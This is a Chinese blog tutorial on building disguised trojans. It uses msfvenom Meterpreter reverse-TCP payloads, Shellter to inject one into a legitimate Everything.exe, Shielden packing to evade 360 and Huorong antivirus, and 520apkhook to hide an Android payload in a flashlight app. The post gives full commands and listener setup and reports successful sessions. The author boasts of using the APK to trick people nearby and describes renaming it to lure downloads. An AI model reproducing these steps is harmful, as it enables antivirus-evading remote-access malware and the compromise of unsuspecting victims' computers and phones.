MSF(3)——apk和exe的加马(过360、火绒)

已于 2022-08-09 19:32:26 修改
阅读量6.1k 收藏 78
点赞数 11
分类专栏: 安全 免杀 文章标签: 网络 安全 运维
于 2022-08-07 23:14:58 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/realmels/article/details/126212963
版权

本专栏是笔者的网络安全学习笔记,一面分享,同时作为笔记

文章目录

前文链接

  1. WAMP/DVWA/sqli-labs 搭建
  2. burpsuite工具抓包及Intruder暴力破解的使用
  3. 目录扫描,请求重发,漏洞扫描等工具的使用
  4. 网站信息收集及nmap的下载使用
  5. SQL注入(1)——了解成因和手工注入方法
  6. SQL注入(2)——各种注入
  7. SQL注入(3)——SQLMAP
  8. SQL注入(4)——实战SQL注入拿webshell
  9. Vulnhub靶机渗透之Me and My Girlfriend
  10. XSS漏洞
  11. 文件上传漏洞
  12. 文件上传绕过
  13. 文件包含漏洞
  14. Vulnhub靶机渗透之zico2
  15. 命令执行漏洞
  16. 逻辑漏洞(越权访问和支付漏洞)
  17. 网站后台安全
  18. weevely的使用及免杀(Linux中的菜刀)
  19. MSF(1)——一次完整的渗透流程
  20. WebShell命令执行限制(解决方案)
  21. 记一次艰难的SQL注入(过安全狗)
  22. MSF(2)——各种木马的生成及简单的免杀

工具地址

shielden

http://www.safengine.com/download/release.zip

520apkhook

https://github.com/cleverbao/520apkhook

exe 加马

我先前写的文章里免杀exe马的方式生成四个文件,上传的时候非常麻烦,而且python的meterpreter功能很少,一般在实际情况中需要上传exe马进行进一步控制,但是传一个exe马上去,不仅会被瞬间秒杀,还会被杀软断开连接,于是就有了以下的内容。

大致流程是先给一个正常的exe文件加后门,然后给他加壳。这样过杀软基本问题就不太大了。

先用kali生成一个exe的马,192.168.220.129是我kali的地址

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.220.129 lport=4444 -f exe -o shell.exe

使用杀毒软件扫描该文件
火绒
在这里插入图片描述
360
在这里插入图片描述

shellter附加

大概意思是把木马里的代码插入到正常的可执行文件中,这样增加木马的混淆性,使其达到免杀的效果。

安装

在这里用shellter工具。

新版的kali没有shellter了,所以要自己安装。

以下代码建议先sudo后用root执行。

apt-get update
apt-get install shellter
dpkg --add-architecture i386 && apt-get update && apt-get install wine32

安装好后直接在控制台输入shellter,显示如下即为安装完成
在这里插入图片描述

软件准备

先要准备一个32位的PE文件,尽量小一些,方便上传。

必须是32位

在这里我选用32位everything.exe,可点该链接下载

下载好以后是一个压缩包,解压之后把里面的everything.exe放到kali中
在这里插入图片描述
在这里插入图片描述

添加后门

启动shellter后,在选择模式后选择A,自动模式

这里要你输入PE文件的路径,直接输everything的绝对路径就好了
在这里插入图片描述
等待数分钟后,要选择是否启用隐身模式这里选择N
在这里插入图片描述
接下来按下图填就好了
在这里插入图片描述
在这里输入攻击机ip和监听端口,然后稍等一下生成木马
在这里插入图片描述
在这里插入图片描述
这个时候木马就已经生成成功了,生成的木马替换了原本PE文件的位置,原本的PE文件存在Shellter_Backups
在这里插入图片描述

杀软测试

分别测试火绒和360
360
在这里插入图片描述
火绒
在这里插入图片描述
此时已经可以过360了

加壳

加壳用到的工具是Shielden

下载下来的Shielden是一个叫release的文件夹,直接运行里面的Shielden.exe即可,运行图如下
在这里插入图片描述

使用

这个工具非常简单,无脑操作即可

点击浏览,导入插入木马的Everything.exe
在这里插入图片描述
检测选项的箭头全部打上
在这里插入图片描述
保护选项的箭头全打上
在这里插入图片描述
CheatDefender的箭头全打上
在这里插入图片描述
点击保护生成加壳后的文件

生成后的文件会在源文件名字后加上_se

生成的文件名为Everything_se.exe
在这里插入图片描述

杀软测试

360
在这里插入图片描述
火绒
在这里插入图片描述
此时已经可以绕过360和火绒了

连接测试

接下来测试一下能否正常使用

kali中msf设置如下

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.220.129
set lport 4444
run

可以看到,成功收到了回显
在这里插入图片描述

apk加马

本来我是不想做这个的,但是拿着这个马对周围的人坑蒙拐骗使人实在心情愉悦。于是就有了以下的部分。

大致流程就是先准备一个正常的apk文件,然后给他附加shellcode,当受害者运行该文件,就会执行shellcode,从而被控制。

由于以下的全部操作都是真实环境,所以在这里我使用了内网穿透和端口转发技术,具体的操作我心情好可能会写,再这里我的ip和端口都打码或用其他数据代替。能明白原理就行了。

先生成一个apk的马

msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.220.129 lport=6666 R>1.apk

使用杀毒软件扫描该文件
火绒
在这里插入图片描述
手机管家
在这里插入图片描述

520apkhook加马

520apkhook是一款基于python3和Java的代码注入工具。用作者的话说是

将msf生成的payload,注入到一个正常的apk文件中,重新打包后进行加固,bypass手机安全管家的检测。

使用该工具加马,要自己先准备一个apk文件,可以到网上去下那种小工具的apk文件,文件相对比较小,也比较容易诱骗。

在这里我准备了一个手电筒的apk
在这里插入图片描述

使用

把apk文件改个名字,放到kali中,方便后期加马

例如我在这里将其改名为flash.apk,并且放到 /home/kali/520apkhook/ 目录下
在这里插入图片描述
接下来直接执行如下代码

python main.py --lhost 192.168.220.129 --lport 6666 -n /home/kali/520apkhook/flash.apk

其中lhost填你自己的ip,lport填你自己监听的端口

如下图即为生成成功
在这里插入图片描述

此时在WorkDir目录下生成如下文件

在这里插入图片描述
这个AllFinish.apk就是加马的apk文件

将其改名为手电筒,方便进行下一步诱骗下载

在这里我就不改名了,并且直接转移到android上

这个handler.rc是msf的执行文件,如果是内网穿透需要手动修改内容

在这里插入图片描述
接下来终端运行msfconsole -r handler.rc打开msf控制台并自动监听
在这里插入图片描述

测试连接

在android手机上运行该apk文件

只是提示签名不一致,继续安装,并运行该文件。
在这里插入图片描述
在这里插入图片描述
也是成功收到连接,得到meterpreter.

在这里插入图片描述
获取系统信息

杀软测试

测试火绒
在这里插入图片描述
火绒不报毒

漫路在线
关注
  • 11
    点赞
  • 78
    收藏
    觉得还不错? 一键收藏
  • 10
    评论
专栏目录
安卓手机渗透测试
11-04
移动安全是当下最热门的话题之一。安卓系统最为市场上占有量最高的移动操作系统,拥有极其广泛的用户基础,大量的个人数据和商业数据都存储在安卓移动设备上。本专栏将从最基础的实验环境搭建,软件安装使用开始讲。没有复杂的原理讲解,更多的实践操作,小白也能跟着从零开始学起。注意:本教程内容仅用于网络安全学习研究,未经授权的入侵需要自己承担相应的责任,与作者无关。
MSF+APK注入绕过手机防护上线远控及安全防护建议
慢就是快
11-17 6225
1.实验环境 MSF、520_APK_HOOK 2.介绍 将msf生成的payload,注入到一个正常的apk文件中,重新打包后进行加固,bypass手机安全管家的检测。 项目地址: https://github.com/cleverbao/520apkhook 作者: BaoGuo 优点 相比于原始的msf远控,此版本app在进行远控时,被注入的app可以正常运行,原始msf生成的app程序,只在桌面上有一个图标,点击后没有任何app界面。 注入后的app在安装时,手机管家不会有任何安全提示,原始msf
使用KALI生成木马病毒实现远程控制
小司机的奥拓
12-25 2308
该文章内容仅用于学习使用Kali Linux系统,请不要将它用于非法的途径,如有意外概不负责。我将会详细介绍使用Kali Linux系统生成木马并用它远程控制一台处在外网的物理计算机,使用到的工具有:1、VMware Workstation Pro 16(虚拟机)下载地址:https://www.vmware.com/cn/products/workstation-pro/workstation-pro-evaluation.html2、Kali Linux 2021(系统)
Android 免杀教程
zkaqlaoniao的博客
10-11 2345
免杀练习两年半VT检测 https://www.virustotal.com/gui/home/upload。
msf 免杀学习笔记-1】
qq_44637753的博客
12-29 1498
venom: payload+encoder msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.174.66 lport=4444 -b “\x00\x0ff” -a x86 --platform windows -e x86/shikata_ga_nai -i 5 -f exe -o /var/www/html/hack.exe 参数: -p :指定需要使用的payload; LHOST:攻击机ip地址; LPORT:攻击
com.variable.apkhook:应用伪装
04-08
com.variable.apkhook Module name 应用伪装 Author 酷安@ Description 模块的二次开发版,暂未开源 Secondary development version of module, not open sourced yet. 为你选择的应用程序传递你伪造的手机信息 Deliver the fake informations you made about your phone to the apps you selected Usage 原作者并没有解释用法,以下的使用教程取自应用变量模块的描述: 首先,你需要选择你想要传递手机伪装信息给哪些APP, (不仅仅在模块中选取,还需要添加到模块作用域中以确保模块可以作用于APP) 然后在模块里填写手机的伪装信息,最后,只需单独重启这些APP即可. Since the author didn'
卡利渗透旧安卓
Aeroguita_Ex的博客
05-13 856
我们把apk脱到android虚拟机中安装,这里我改了一下名字,想装得像一点还可以给他加工图标,或者用原本功能正常的apkmsf和520apkhook加木马(亲测可行,推荐小一点的什么连点器之类,相比于原始的msf远控,此版本app在进行远控时,被注入的app可以正常运行,原始msf生成的app程序,只在桌面上有一个图标,点击后没有任何app界面。注入后的app在安装时,手机管家不会有任何安全提示,原始msf生成的app程序,安装时手机管家会有安全警示。1.最好的办法就是不安装不认识的软件。
APP安全测试——HOOK技术
热门推荐
LiBai'S BLOG
03-21 1万+
最近学习app的测试学会了客户端的测试方法。只知道怎么实现将其中存在的漏洞和不合规项找出来但是不知道其中的原理。一直再说HOOK技术,也就是所谓的钩子今天了解一下他到底是个啥东西。 HOOK Hook 英文翻译过来就是「钩子」的意思,那我们在什么时候使用这个「钩子」呢?在 Android 操作系统中系统维护着自己的一套事件分发机制。应用程序,包括应用触发事件和后台逻辑处理,也是根据事件流程一步步地向下执行。而「钩子」的意思,就是在事件传送到终点前截获并监控事件的传输,像个钩子钩上事件一样,并且能够在钩上事件
msf入侵安卓实战
m0_65109001的博客
01-04 2313
msf安卓渗透
利用MSF打包加固APK对安卓手机进行控制
dl1286670932的博客
10-08 6469
由于经典的MSF生成apk安装包控制,版本较低,高版本安卓手机可能会出现版本不支持或无法使用的现象,而且apk无法正常使用,没有图形化界面,比较假。相比于原始的msf远控,此版本app在进行远控时,被注入的app可以正常运行,原始msf生成的app程序,只在桌面上有一个图标,点击后没有任何app界面。注入后的app在安装时,手机管家不会有任何安全提示,原始msf生成的app程序,安装时手机管家会有安全警示。
linux系统安装msf的过程详解
01-09
还是自己写下安装过程吧! 我的服务器系统是 Aliyun linux 1、下载安装 curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall 可能报错:Couldn’t open file /etc/pki/rpm-gpg/RPM-GPG-KEY-Metasploit 是因为安装库的
php-msf源码详解
10-18
主要介绍了php-msf源码的意思以及用法相关问题,有需要的朋友跟着参考学习下吧。
比较RationalUnifiedProcess(RUP)和MicrosoftSolutionsFramework(MSF)
03-03
火龙果软件工程技术中心 本文内容包括:RUP和MSF的定义第一印象:从MSF到RUP的高层的映射过程设想映射其他元素原则结束语致谢:注释参考文献:现在对本文进行讨论!参考资料本文来自于RationalEdge:...
SE一键加壳三十秒秒过360.zip
09-20
SE一键加壳三十秒秒过360 快速(bypass)免杀360 3步快速加壳 (短期内应该有效) 作者自己在虚拟机测试时msf的木马能过360
关于如何使用shellter以及shielden对于正常软件的双重加壳,过火绒360
07-16
本资源是本人自己学习msf是针对于加壳入侵而特地学习和总结,为了和同工作室进行分享而编辑的ppt,如果有兄弟需要软件以及更加详细的操作的可以私信我,当然我是一个刚刚入门的新手,如果有错误的地方可以告诉我,...
基于MSF的增强版多源传感器融合框架 (VSLAMIMUGNSS).zip
最新发布
01-24
ETH的MSF是一个非常优秀的多源传感器融合(松耦合)开源框架,尽管是松耦合,但是最终经过修改和调试后的MSF的效果依然让我觉得非常惊喜。同时由于MSF原始代码非常的不优美简洁,所以我特地将MSF源码作为一个“库”...
记一次艰难的SQL注入(过安全狗)
realmels的博客
02-01 1万+
本专栏是笔者的网络安全学习笔记,一面分享,同时作为笔记 文章目录前文链接1.1 前言2.1 注入测试2.1.1 绕过第一式:汉字双字节编码绕过单引号3.1 获取数据库3.1.1 绕过第二式:注释3.1.2 绕过第三式:内联注释绕过空格4.1 获取表名4.1.1 绕过第四式:select过安全狗5.1 获取列名5.1.1 绕过第五式:骚操作绕过魔术函数6.1 爆帐密总结 前文链接 WAMP/DVWA/sqli-labs 搭建 burpsuite工具抓包及Intruder暴力破解的使用 目录扫描,请求重发.
burpsuite工具抓包及Intruder暴力破解的使用
realmels的博客
12-20 5626
本专栏是笔者的网络安全学习笔记,一面分享,同时作为笔记 前文链接 WAMP/DVWA/sqli-labs 搭建 前言 仅供交流分享,禁止用于非法用途 上篇已经搭建好了靶机,这篇简单讲解工具burpsuite的使用,以及用burpsuite的Intruder暴力破解密码。 ButpSuite工具安装 参考文章:https://www.ddosi.com/b309/我是按照这篇文章安装的burpsuite,可以自己参考这篇文章。 首先需要下载jdk,要下载jdk9及以上版本,我这里下载的是jdk11 .
msf和frp内网穿透
08-19
msf和frp都是常用于内网穿透的工具,可以帮助远程访问和控制内网中的设备。 Metasploit Framework(简称msf)是一个开源的渗透测试框架,它提供了丰富的渗透测试工具和模块。虽然msf主要是用于渗透测试和漏洞利用,但它也可以通过反向连接来实现内网穿透。你可以在目标机器上执行一个反向Shell并将其连接到外部控制台,从而实现对内网设备的访问。 Frp是一个高性能的反向代理工具,可以帮助将内网服务暴露到公网中,实现内网穿透。通过在内网中启动Frp客户端,并在公网服务器上启动Frp服务器端,你可以将内网中的服务映射到公网IP上,从而实现对内网设备的远程访问。 总之,无论你选择使用msf还是frp,都可以帮助你实现内网穿透,让你可以方便地远程访问和控制内网中的设备。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 10
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值